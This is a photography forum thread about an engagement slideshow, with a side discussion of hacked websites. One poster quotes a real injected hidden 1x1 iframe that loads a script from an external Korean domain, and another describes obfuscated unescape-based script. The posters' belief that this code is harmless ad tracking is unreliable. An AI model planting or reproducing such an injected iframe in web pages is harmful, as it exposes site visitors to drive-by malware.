WnSoft Forums

Engagement Show

Dusty

Hello! I've just uploaded a new show of some engagement portraits I've done. File size is 21.3MB and can be downloaded at: http://www.daydreamsart.com/engagementshow.zip No, it is not created with the cool version 5. Not a lot of PS tricks in this one either, just a simple show that I hope will make you smile!

~Cindy

Very nice slideshow Cindy. There are some great images there and also on your website, although I did get a virus warning when I clicked on your homepage!

Now if that wasn't disturbing!!! Thanks for the heads up. OMG. I did check my home page and there was some real freaky java script at the very top, right before the html tag. I've replaced that page with my original index page which is why you didn't get the warning, Ken. I also went through the rest of my index pages and could not find it anywhere else. Now I need to find out how it happened so it doesn't happen again. Stevie, thanks for the compliment and the heads up.

Now if that wasn't disturbing!!! Thanks for the heads up. OMG. I did check my home page and there was some real freaky java script at the very top, right before the html tag. I've replaced that page with my original index page which is why you didn't get the warning, Ken. I also went through the rest of my index pages and could not find it anywhere else. Now I need to find out how it happened so it doesn't happen again. Stevie, thanks for the compliment and the heads up.

No problem, nothing like scaring your customers off!!

Can I ask what actions you are using on your pix?

Looks likes cross process or velvia?

Cindy,

Beautiful portrait photos as usual! You have a real knack for natural-looking poses! Makes me wish I were that young again! ;)

As I was watching the show, it suddenly occurred to me that you are missing one pose, which could serve as the ending - a couple of 90-yr-olds going down the road into the sunset holding hands.

But I do love your work! :)

p.s. no popups or viruses here, either.

Hi Cindy,

It's a problem which seems to be going around lately and I suspect it's caused by a worm on your web site host's server. I had a very similar incident in the past few days.

I had to get a new host and move about 20 gigabytes of code to the new server. For 24 hours everything worked perfectly then suddenly every time anyone would call up my website they would get a warning from Internet Explorer which indicated that a program was attempting to download a Java script to their hard drive. I checked my index.htm and index1.htm files (I have frames) and found a single line of code as follows:

<iframe src=http://x-road.co.kr/rich/out.php width=1 height=1></iframe>

This small line of code calls a Java script which loads on one's hard drive and contacts a Google link which has to do with ads. I doubt that it's in any way dangerous but primarily a P.I.T.A. to have to search and fix.

I contacted my host and warned them to look for a worm or possibly a breach of security which has allowed a web crawler or spyder to infiltrate the server and modify the index files it finds.

Best regards,

Lin

Thanks everyone! I'm so glad you liked the show. I like your idea, Al. I'll remember it! I stuck with my newly engaged couples for this show, but I do have married and even long time married couples I've done the same style of portraits for, so someday I'll put together a show like that.

I called iPowerWeb who hosts my site and they were very helpful. Like Lin said, the code is ad related. It counts hits on my site for hits for them, I have no idea how that's good, but it's not a virus that damages someone's system. There is a program out there that when a site is targeted, it will automatically try every word until it gets in. Scary thought. The tech helped me pick a password that would be a lot more difficult, so hopefully that problem is solved. The actual java script code on my page which does not have frames looked like this <script language="javascript"> document.write ( unescape( ' -----------")); </script>

The "-------" was actually several lines of numbers and % signs, and was all above the <html> tag.

Stevie, I don't use any actions for that look. I do shoot in the RAW format which I feel helps a picture to "pop" more, and process in Adobe's ACR which really helps boost the contrast. I usually boost the contrast a little bit more in Photoshop via contrast, levels, curves, or selective color adjustment layer.

Thanks everyone! I'm so glad you liked the show. I like your idea, Al. I'll remember it! I stuck with my newly engaged couples for this show, but I do have married and even long time married couples I've done the same style of portraits for, so someday I'll put together a show like that.

No, I was thinking of a newly-engaged old couple (they fall in love too sometimes) - it would add a counter-point to the show, and a little touch of warm humour at the end. No? :)